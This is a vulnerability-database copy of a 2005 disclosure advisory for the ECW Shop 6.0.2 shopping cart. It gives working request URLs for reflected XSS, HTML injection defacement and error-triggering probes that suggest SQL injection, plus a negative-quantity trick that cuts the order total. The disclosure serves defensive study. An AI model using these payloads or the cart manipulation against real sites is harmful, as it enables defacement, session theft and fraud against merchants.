Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ECWshop.txt

🗓️ 17 Aug 2005 00:00:00Reported by John CobbType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

Remote vulnerabilities discovered in ECW Shop 6.0.2, including XSS, Information Disclosure, HTML Injection, and Cart/Order Manipulation. No response or fixes from the authors

Code
`Hello All,  
  
I have discovered a number of remote vulnerabilities in: ECW Shop 6.0.2  
  
Authors Site: http://www.soft4e.com/  
  
ECW Shop is described by its authors as:  
  
ECW-Shop - simple for use featured shopping cart with ability to use Excel  
or Access format for database.  
  
+-[Examples:]--------------------------------------------------+  
  
  
  
[1]------------------------------------------------------------+  
  
XSS: (This same problem was reported on version 5.5 by David S. Ferreira -  
http://www.securityfocus.com/bid/9244)  
  
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3  
6d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script  
>  
  
[2]------------------------------------------------------------+  
  
Information Disclosure & Possible SQL Injection:  
  
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3  
6d90d8e9&key=1&comp=1&min='&max=1  
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3  
6d90d8e9&key=1&comp=1&min=1&max='  
  
Error:  
  
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result  
resource in /var/www/html/search.php on line 109  
  
[3]------------------------------------------------------------+  
  
HTML Injection:  
  
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3  
6d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>  
http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&i  
d=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&ma  
x=1  
  
[4]------------------------------------------------------------+  
  
Cart/Order Manipulation:  
  
You can add negative quanity value items to your cart to gain credit.  
  
Example:  
  
Add '-1' of an item with a value of £4.99 Add '1' of an item with a value of  
£6.99  
  
Cart Total: £2.00  
  
+-[Notes:]-----------------------------------------------------+  
  
Vulnerabilities found on: 06/08/2005  
Author(s) Informed on: 06/08/2005  
Author(s) Response: NONE  
Author(s) Fix: NONE  
  
  
[email protected]  
  
http://www.NoBytes.com  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4
ecw shop 6.0.2remote vulnerabilitiesxssinformation disclosuresql injectionhtml injectioncart manipulationauthor response.
24